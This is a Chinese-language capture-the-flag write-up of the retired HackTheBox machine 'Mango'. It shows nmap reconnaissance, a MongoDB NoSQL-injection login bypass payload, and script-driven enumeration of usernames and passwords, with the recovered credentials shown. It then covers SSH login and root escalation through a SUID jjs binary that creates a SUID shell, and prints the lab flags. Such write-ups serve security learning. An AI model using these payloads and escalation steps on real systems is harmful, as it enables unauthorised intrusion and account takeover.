HACKTHEBOX通关笔记——mango(退役)

信息收集

端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sC -sV -A -p- --min-rate=10000 10.129.229.185
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-31 20:44 EST
Warning: 10.129.229.185 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.229.185
Host is up (0.23s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_http-server-header: Apache/2.4.29 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/31%OT=22%CT=1%CU=35063%PV=Y%DS=2%DC=I%G=Y%TM=65BA
OS:F820%P=x86_64-pc-linux-gnu)SEQ()SEQ(SP=107%GCD=1%ISR=10B%TI=Z%TS=A)SEQ(S
OS:P=107%GCD=1%ISR=10B%TI=Z%CI=Z%TS=A)SEQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=Z%II
OS:=I%TS=C)OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7
OS:%O5=M53CST11NW7%O6=M53CST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%
OS:W6=7120)ECN(R=N)ECN(R=Y%DF=Y%T=40%W=7210%O=M53CNNSNW7%CC=Y%Q=)T1(R=N)T1(
OS:R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T4(R=Y%DF=Y%T=4
OS:0%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=N)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)T7(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%DF=N%T=40%IPL=16
OS:4%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Host: 10.129.229.185; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 143/tcp)
HOP RTT    ADDRESS
1   ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.51 seconds

通过扫描端口发现开放端口为80、443、22,且443端口下存在commonName=staging-order.mango.htb,将该域名加入hosts

┌──(root㉿kali)-[~]
└─# cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.129.229.185  staging-order.mango.htb

访问https://staging-order.mango.htb

访问http://staging-order.mango.htb

漏洞利用

抓包简单爆破用户名

爆破发现返回结果都是200,没有可利用信息,根据名称猜测可能是mangodb数据库。

发现一篇文章,为mangodb注入(https://www.ddosi.org/b292/

mangodb数据库存在基本的身份验证绕过,攻击这可以尝试在字段值中输入MongoDB运算符,如$eq(等于),$ne(不等于)或$gt(大于)。这是在PHP应用程序中使用直接从表单获取参数值的方式来构建数据库查询的不安全方法:

$query = array("user" => $_POST["username"], "password" => 
    $_POST["password"]);

如果此查询随后用于检查登录凭据,则攻击者可以滥用PHP的内置关联数组处理来注入始终返回true并绕过身份验证过程的MongoDB查询。

基于此我们可以在数据包中加入mangodb运算符尝试mangodb注入。

username[$ne]=toto&password[$regex]=.{1}

返回包出现一个home.php,访问看下

访问得到一个邮箱admin@mango.htb

在github看到一个脚本,可用于枚举存在mangodb注入的账号密码

https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

# python3 nosqli-user-pass-enum.py                        
usage: nosqli-user-pass-enum.py [-h] [-u URL] [-up parameter] [-pp parameter] [-op parameters] [-ep parameter] [-m Method]

options:
  -h, --help      show this help message and exit
  -u URL          Form submission url. Eg: http://example.com/index.php
  -up parameter   Parameter name of the username. Eg: username, user
  -pp parameter   Parameter name of the password. Eg: password, pass
  -op parameters  Other paramters with the values. Separate each parameter with a comma(,). Eg: login:Login, submit:Submit
  -ep parameter   Parameter that need to enumerate. Eg: username, password
  -m Method       Method of the form. Eg: GET/POST
None

Example: python nosqli-user-pass-enum.py -u http://example.com/index.php -up username -pp password -ep username -op login:login,submit:submit -m POST

使用脚本进行爆破

┌──(root㉿kali)-[/redteam/mangodb/mongodb/mongodb]
└─# python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -op login:login -ep password -m POST
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
No pattern starts with 'a'
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
Pattern found that starts with 'h'
Pattern found: h3
Pattern found: h3m
Pattern found: h3mX
Pattern found: h3mXK
Pattern found: h3mXK8
Pattern found: h3mXK8R
Pattern found: h3mXK8Rh
Pattern found: h3mXK8RhU
Pattern found: h3mXK8RhU~
Pattern found: h3mXK8RhU~f
Pattern found: h3mXK8RhU~f{
Pattern found: h3mXK8RhU~f{]
Pattern found: h3mXK8RhU~f{]f
Pattern found: h3mXK8RhU~f{]f5
Pattern found: h3mXK8RhU~f{]f5H
password found: h3mXK8RhU~f{]f5H
No pattern starts with 'i'
No pattern starts with 'j'
No pattern starts with 'k'
No pattern starts with 'l'
No pattern starts with 'm'
No pattern starts with 'n'
No pattern starts with 'o'
No pattern starts with 'p'
No pattern starts with 'q'
No pattern starts with 'r'
No pattern starts with 's'
Pattern found that starts with 't'
Pattern found: t9
Pattern found: t9K
Pattern found: t9Kc
Pattern found: t9KcS
Pattern found: t9KcS3
Pattern found: t9KcS3>
Pattern found: t9KcS3>!
Pattern found: t9KcS3>!0
Pattern found: t9KcS3>!0B
Pattern found: t9KcS3>!0B#
Pattern found: t9KcS3>!0B#2
password found: t9KcS3>!0B#2

2 password(s) found:
h3mXK8RhU~f{]f5H
t9KcS3>!0B#2

得到两个密码,再次使用脚本枚举下用户名

┌──(root㉿kali)-[/redteam/mangodb/mongodb/mongodb]
└─# python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -op login:login -ep username -m POST
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
No pattern starts with 'h'
No pattern starts with 'i'
No pattern starts with 'j'
No pattern starts with 'k'
No pattern starts with 'l'
Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mango

2 username(s) found:
admin
mango

由此可得到两个账号密码

admin:t9KcS3>!0B#2
mango:h3mXK8RhU~f{]f5H

尝试登录看看,登录web失败,记得端口扫描开放了22端口,登录ssh看看

使用mango账号成功登录ssh

┌──(root㉿kali)-[/redteam/mangodb/mongodb/mongodb]
└─# sshpass -p 'h3mXK8RhU~f{]f5H' ssh mango@10.129.229.185
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
​
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
​
  System information as of Fri Feb  2 05:09:54 UTC 2024
​
  System load:  0.0               Processes:           100
  Usage of /:   57.8% of 5.29GB   Users logged in:     0
  Memory usage: 14%               IP address for eth0: 10.129.229.185
  Swap usage:   0%
​
​
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
​
118 packages can be updated.
18 updates are security updates.
​
​
Last login: Mon Sep 30 02:58:45 2019 from 192.168.142.138
mango@mango:~$ whoami&&id
mango
uid=1000(mango) gid=1000(mango) groups=1000(mango)

在admin用户下发现user.txt,但权限不够,无法访问

mango@mango:/home$ ls
admin  mango
mango@mango:/home$ cd admin
mango@mango:/home/admin$ ls
user.txt
mango@mango:/home/admin$ cat user.txt
cat: user.txt: Permission denied

使用前面发现的另一个密码切换至admin用户

mango@mango:~$ su - admin
Password: 
$ whoami&&id
admin
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)
$ /bin/bash -i
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@mango:/home/admin$ cat user.txt
8b2e26139da12476c7d609ab50766c76

权限提升

查看suid文件

admin@mango:/home/admin$ find / -user root -perm -4000 2>/dev/null
/bin/fusermount
/bin/mount
/bin/umount
/bin/su
/bin/ping
/snap/core/7713/bin/mount
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount
/snap/core/7713/usr/bin/chfn
/snap/core/7713/usr/bin/chsh
/snap/core/7713/usr/bin/gpasswd
/snap/core/7713/usr/bin/newgrp
/snap/core/7713/usr/bin/passwd
/snap/core/7713/usr/bin/sudo
/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7713/usr/lib/openssh/ssh-keysign
/snap/core/7713/usr/lib/snapd/snap-confine
/snap/core/7713/usr/sbin/pppd
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/run-mailcap
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine

在结果看到两个二进制文件run-mailcap和jjs

https://gtfobins.github.io/gtfobins/run-mailcap/
https://gtfobins.github.io/gtfobins/jjs/#suid

根据资料可得知run-mailcap和jjs程序可用于root身份执行命令,执行jjs并使用java的Runtime.Exec()函数生成一个shell

admin@mango:/home/admin$ jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> Java.type('java.lang.Runtime').getRuntime().exec('cp /bin/sh /tmp/sh').waitFor()
0
jjs> Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /tmp/sh').waitFor()
0 
admin@mango:/home/admin$ /tmp/sh -p
# id
uid=4000000000(admin) gid=1001(admin) euid=0(root) groups=1001(admin)
# whoami
root
# ls /root
root.txt
# cat /root/root.txt
30c7732f9b112a3f7cf812e3e2615928
相关推荐
aloha_7893 小时前
从零记录搭建一个干净的mybatis环境
java·笔记·spring·spring cloud·maven·mybatis·springboot
dsywws4 小时前
Linux学习笔记之vim入门
linux·笔记·学习
A-超6 小时前
vue3展示pag格式动态图
笔记
u0101526587 小时前
STM32F103C8T6学习笔记2--LED流水灯与蜂鸣器
笔记·stm32·学习
weixin_518285057 小时前
深度学习笔记10-多分类
人工智能·笔记·深度学习
丘狸尾7 小时前
ubuntu【桌面】 配置NAT模式固定IP
笔记
王俊山IT8 小时前
C++学习笔记----10、模块、头文件及各种主题(二)---- 预处理指令
开发语言·c++·笔记·学习
慕卿扬8 小时前
基于python的机器学习(二)—— 使用Scikit-learn库
笔记·python·学习·机器学习·scikit-learn
齐 飞10 小时前
MongoDB笔记02-MongoDB基本常用命令
前端·数据库·笔记·后端·mongodb
flying robot10 小时前
Go结构体(struct)
笔记